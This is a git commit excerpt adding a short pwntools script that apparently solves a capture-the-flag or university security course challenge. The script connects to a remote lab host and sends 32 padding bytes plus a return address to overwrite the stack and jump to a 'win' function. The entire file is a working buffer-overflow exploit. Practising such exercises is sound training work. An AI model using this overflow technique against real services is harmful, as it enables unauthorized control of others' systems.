This commit is contained in:
2025-12-20 16:49:47 +00:00
parent ef11ce0307
commit 555b9062f3
19 changed files with 234 additions and 1 deletions

View File

@@ -0,0 +1,12 @@
from pwn import *
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25153
WIN_ADDR = 0x080486f1
conn = remote(HOST, PORT)
conn.recvuntil("?\n")
conn.send(b"\x55"*32 + b"\xf1\x86\x04\x08\n")
conn.interactive()